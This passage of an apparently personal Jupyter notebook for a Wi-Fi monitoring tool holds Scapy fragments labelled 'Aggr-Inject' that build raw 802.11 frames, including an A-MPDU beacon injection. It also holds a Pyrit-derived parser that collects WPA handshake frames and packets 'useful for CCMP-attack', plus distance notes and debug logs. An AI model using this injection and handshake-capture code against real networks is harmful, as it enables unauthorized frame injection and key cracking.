" self.rt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\\x00\\x6c' + get_frequency(CHANNEL) + '\\xc0\\x00\\xc0\\x01\\x00\\x00')\n",
" self.dot11hdr = Dot11(type=\"Data\", subtype=DOT11_SUBTYPE_DATA, addr1=recv_mac, addr2=trans_mac, addr3=dst_mac, SC=0x3060, FCfield=0x01)\n",
" self.data = self.rt / self.dot11hdr\n",
" self.recv_mac = recv_mac\n",
" self.trans_mac = trans_mac\n",
" self.dst_mac = dst_mac\n"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### 2. Aggr-Inject"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
" def __init__(self, recv_mac, src_mac, dst_mac, ds=0x01):\n",
" self.rt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\\x00\\x6c' + get_frequency(CHANNEL) + '\\xc0\\x00\\xc0\\x01\\x00\\x00')\n",
" self.dot11hdr = Dot11(type=\"Data\", subtype=DOT11_SUBTYPE_QOS_DATA, addr1=recv_mac, addr2=src_mac, addr3=dst_mac, SC=0x3060, FCfield=ds) / Raw(\"\\x80\\x00\")\n",
" self.data = self.rt / self.dot11hdr\n",
" self.num_subframes = 0\n",
" self.recv_mac = recv_mac\n",
" self.src_mac = src_mac\n",
" self.dst_mac = dst_mac"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### 3. Aggr-Inject"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
" def __init__(self, recv_mac, src_mac, dst_mac, ds=0x01):\n",
" self.rt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\\x00\\x6c' + get_frequency(CHANNEL) + '\\xc0\\x00\\xc0\\x01\\x00\\x00')\n",
" self.dot11hdr = Dot11(type=\"Data\", subtype=DOT11_SUBTYPE_QOS_DATA, addr1=recv_mac, addr2=src_mac, addr3=dst_mac, SC=0x3060, FCfield=ds) / Raw(\"\\x00\\x00\")\n",
" self.data = self.rt\n",
" self.num_subframes = 0\n",
" self.recv_mac = recv_mac\n",
" self.src_mac = src_mac\n",
" self.dst_mac = dst_mac\n"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### 4. Pyrit"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"# May result in 'anonymous' AP\n",
" self._add_ap(ap_mac, dot11_pckt)\n",
" ap = self.air[ap_mac]\n",
"\n",
" self._add_station(ap, sta_mac)\n",
" sta = ap[sta_mac]\n",
"\n",
" if EAPOL_WPAKey in dot11_pckt:\n",
" wpakey_pckt = dot11_pckt[EAPOL_WPAKey]\n",
" elif EAPOL_RSNKey in dot11_pckt:\n",
" wpakey_pckt = dot11_pckt[EAPOL_RSNKey]\n",
" elif dot11_pckt.isFlagSet('type', 'Data') \\\n",
" and dot11_pckt.haslayer(scapy.layers.dot11.Dot11WEP):\n",
" # An encrypted data packet - maybe useful for CCMP-attack\n",
"\n",
" dot11_wep = str(dot11_pckt[scapy.layers.dot11.Dot11WEP])\n",
" # Ignore packets which has less than len(header + data + signature)\n",
" if len(dot11_wep) < 8 + 6 + 8:\n",
" return\n",
"\n",
" # Ignore packets with high CCMP-counter. A high CCMP-counter\n",
" # means that we missed a lot of packets since the last\n",
" # authentication which also means a whole new authentication\n",
" # might already have happened.\n",
" ccmp_counter = (dot11_wep[0:2] + dot11_wep[4:8])[::-1]\n",
" if int(binascii.hexlify(ccmp_counter), 16) < 30:\n",
" self._add_ccmppckt(sta, pckt)\n",
" return\n",
" else:\n",
" return\n",
"\n",
" # Frame 1: pairwise set, install unset, ack set, mic unset\n",
" # results in ANonce\n",
" if wpakey_pckt.areFlagsSet('KeyInfo', ('pairwise', 'ack')) \\\n",
" and wpakey_pckt.areFlagsNotSet('KeyInfo', ('install', 'mic')):\n",
" self._add_keypckt(sta, 0, pckt)\n",
" return\n",
"\n",
" # Frame 2: pairwise set, install unset, ack unset, mic set,\n",
" # SNonce != 0. Results in SNonce, MIC and keymic_frame\n",
" elif wpakey_pckt.areFlagsSet('KeyInfo', ('pairwise', 'mic')) \\\n",
" and wpakey_pckt.areFlagsNotSet('KeyInfo', ('install', 'ack')) \\\n",
" and not all(c == '\\x00' for c in wpakey_pckt.Nonce):\n",
" self._add_keypckt(sta, 1, pckt)\n",
" return\n",
"\n",
" # Frame 3: pairwise set, install set, ack set, mic set\n",
" # Results in ANonce\n",
" elif wpakey_pckt.areFlagsSet('KeyInfo', ('pairwise', 'install', \\\n",
" 'ack', 'mic')):\n",
" self._add_keypckt(sta, 2, pckt)\n",
" return\n"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### 5. Aggr-Inject"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"def ssid_packet():\n",
" ap_mac = '00:00:00:00:00:00'\n",
" rt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\\x00\\x6c' + get_frequency(CHANNEL) + '\\xc0\\x00\\xc0\\x01\\x00\\x00')\n",
" beacon_packet = Dot11(subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=ap_mac, addr3=ap_mac) \\\n",
" / Dot11Beacon(cap=0x2105) \\\n",
" / Dot11Elt(ID='SSID', info=\"injected SSID\") \\\n",
" / Dot11Elt(ID='Rates', info=AP_RATES) \\\n",
" / Dot11Elt(ID='DSset', info=chr(CHANNEL))\n",
"\n",
" # Update sequence number\n",
" beacon_packet.SC = 0x3060\n",
"\n",
" # Update timestamp\n",
" beacon_packet[Dot11Beacon].timestamp = time.time()\n",
"\n",
" mpdu_len = len(beacon_packet) + 4\n",
"\n",
" if mpdu_len % 4 != 0:\n",
" padding = \"\\x00\" * (4 - (mpdu_len % 4)) # Align to 4 octets\n",
" else:\n",
" padding = \"\"\n",
" mpdu_len <<= 4\n",
" crc_fun = crcmod.mkCrcFun(0b100000111, rev=True, initCrc=0x00, xorOut=0xFF)\n",
"\n",
" crc = crc_fun(struct.pack('<H', mpdu_len))\n",
" maccrc = dot11crc(str(beacon_packet))\n",
" delim_sig = 0x4E\n",
"\n",
" #print('a-mpdu: len %d crc %02x delim %02x' % (mpdu_len >> 4, crc, delim_sig))\n",
" #hexdump(maccrc)\n",
" ampdu_header = struct.pack('<HBB', mpdu_len, crc, delim_sig)\n",
" #hexdump(ampdu_header)\n",
"\n",
" data = ampdu_header / beacon_packet / maccrc / padding\n",
" data /= \"\\x00\\x00\\x20\\x4e\" * 8\n",
" data = str(data)\n",
"\n",
" return data"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Calculating distance of a wireless device\n",
"\n",
"This is where I wish I had payed more attention in math class.\n",
"\n",
"### Calculating Frame Margin. (or whatever FSPL is.)\n",
"\n",
"`FSPL (dB) = 20log10(d) + 20log10(f) + K`\n",
"\n",
"d = distance\n",
"f = frequency\n",
"K= constant that depends on the units used for d and f\n",
"If d is measured in kilometers, f in MHz, the formula is:\n",
"\n",
"`FSPL (dB) = 20log10(d)+ 20log10(f) + 32.44`\n",
"\n",
"Free Space Path Loss=Tx Power-Tx Cable Loss+Tx Antenna Gain+Rx Antenna Gain - Rx Cable Loss - Rx Sensitivity - Fade Margin \n",
"\n",
"FSPL = Tx Power - Tx CBLS + Tx AntGain + Rx AntGain - RxCBLS - Rx Sensitivity - Fade Margin"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Debuging Output"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"\n",
"\n",
"```shell\n",
" █▀▀█ █▀▀█ █▀▀█ █──█ █▀▀ █──█ ─▀─ █▀▀▄ █▀▀▀ ▀▀█▀▀ ─▀─ █▀▀▀ █▀▀ █▀▀█\n",
"░█─── █▄▄▀ █──█ █──█ █── █▀▀█ ▀█▀ █──█ █─▀█ ─░█── ▀█▀ █─▀█ █▀▀ █▄▄▀\n",
"░█▄▄█ ▀─▀▀ ▀▀▀▀ ─▀▀▀ ▀▀▀ ▀──▀ ▀▀▀ ▀──▀ ▀▀▀▀ ─░█── ▀▀▀ ▀▀▀▀ ▀▀▀ ▀─▀▀\n",
"INFO: Started crouching tiger\n",
"INFO: Started logger...\n",
"INFO: Started crouching tiger\n",
"INFO: Started logger...\n",
"INFO: Beginning Mac Purge\n",
"DEBUG: args: $Namespace(name='wlan0', config_file='config_path', log_level='DEBUG', log_file='/var/log/ctiger.log', module='mac', mon_type='switch', valid_file='ct_valid.csv', channels='1,7,6,11', fun=<function Purge.mac_purge at 0x7f9166405a80>)\n",
"DEBUG: Kwargs: ${'name': 'wlan0', 'config_file': 'config_path', 'log_level': 'DEBUG', 'log_file': '/var/log/ctiger.log', 'module': 'mac', 'mon_type': 'switch', 'valid_file': 'ct_valid.csv', 'channels': '1,7,6,11', 'fun': <function Purge.mac_purge at 0x7f9166405a80>}\n",
"DEBUG: Interface: $None\n",
"DEBUG: Self Interface: $None\n",
"DEBUG: Monitor Type: $switch\n",
"DEBUG: Kwargs: ${'interface': 'wlan0', 'mon_type': 'switch', 'valid_file': 'ct_valid.csv', 'channels': '1,7,6,11'}\n",
"DEBUG: Interface: $wlan0\n",
"DEBUG: Self Interface: $wlan0\n",
"DEBUG: Monitor Type: $switch\n",
"DEBUG: Kwargs: ${}\n",
"DEBUG: Interface: $None\n",
"DEBUG: Self Interface: $None\n",
"DEBUG: Monitor Type: $None\n",
"DEBUG: Monitor Type:\n",
"DEBUG: mac_address: $3d:1d:06:fd:9b:e1\n",
"DEBUG: Monitor Type: $None\n",
"INFO: Starting monitor interface\n",
"DEBUG: Invalid monitor type\n",
"```"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Custom Scapy Sessions\n",
"\n",
"One can configure their own scapy session, "
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"# SPDX-License-Identifier: GPL-2.0-only\n",
"# This file is part of Scapy\n",
"# See https://scapy.net/ for more information\n",
"\n",
"\"\"\"\n",
"Sessions: decode flow of packets when sniffing\n",
"\"\"\"\n",
"\n",
"from collections import defaultdict\n",
"import socket\n",
"import struct\n",
"\n",
"from scapy.compat import orb\n",
"from scapy.config import conf\n",
"from scapy.packet import NoPayload, Packet\n",
"from scapy.pton_ntop import inet_pton\n",
"\n",
"# Typing imports\n",
"from typing import (\n",
" Any,\n",
" DefaultDict,\n",
" Dict,\n",
" Iterator,\n",
" List,\n",
" Optional,\n",
" Tuple,\n",
" cast,\n",
" TYPE_CHECKING,\n",
")\n",
"from scapy.compat import Self\n",
"if TYPE_CHECKING:\n",
" from scapy.supersocket import SuperSocket\n",
"\n",
"\n",
"# You will only need to extend the Default Session\n",
"class DefaultSession(object):\n",
" \"\"\"Default session: no stream decoding\"\"\"\n",
"\n",
" def __init__(self, supersession: Optional[Self] = None):\n",
" if supersession and not isinstance(supersession, DefaultSession):\n",
" supersession = supersession()\n",
" self.supersession = supersession\n",
"\n",
" def process(self, pkt: Packet) -> Optional[Packet]:\n",
" \"\"\"\n",
" Called to pre-process the packet\n",
" \"\"\"\n",
" # Optionally handle supersession\n",
" if self.supersession:\n",
" return self.supersession.process(pkt)\n",
" return pkt\n",
"\n",
" def recv(self, sock: 'SuperSocket') -> Iterator[Packet]:\n",
" \"\"\"\n",
" Will be called by sniff() to ask for a packet\n",
" \"\"\"\n",
" pkt = sock.recv()\n",
" if not pkt:\n",
" return\n",
" pkt = self.process(pkt)\n",
" if pkt:\n",
" yield pkt\n",
" \n",
" \n",
"class Dot11Session(DefaultSession):\n",
" \"\"\"Decode Dot11 packets 'on-the-flow'.\n",
"\n",
" Usage:\n",
" >>> sniff(session=Dot11Session)\n",
" \"\"\"\n",
"\n",
" def __init__(self, *args, **kwargs):\n",
" # type: (*Any, **Any) -> None\n",
" DefaultSession.__init__(self, *args, **kwargs)\n",
" self.keys = {} # type: Dict[Tuple[Any, ...], List[Packet]] # noqa: E501\n",
"\n",
"\n",
"class IPSession(DefaultSession):\n",
" \"\"\"Defragment IP packets 'on-the-flow'.\n",
"\n",
" Usage:\n",
" >>> sniff(session=IPSession)\n",
" \"\"\"\n",
"\n",
" def __init__(self, *args, **kwargs):\n",
" # type: (*Any, **Any) -> None\n",
" DefaultSession.__init__(self, *args, **kwargs)\n",
" self.fragments = defaultdict(list) # type: DefaultDict[Tuple[Any, ...], List[Packet]] # noqa: E501\n",
"\n",
" def process(self, packet: Packet) -> Optional[Packet]:\n",
" from scapy.layers.inet import IP, _defrag_ip_pkt\n",
" if IP not in packet:\n",
" return packet\n",
" return _defrag_ip_pkt(packet, self.fragments)[1] # type: ignore\n"
]
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"name": "python",
"version": "3.11.6"
},
"orig_nbformat": 4
},
"nbformat": 4,
"nbformat_minor": 2
}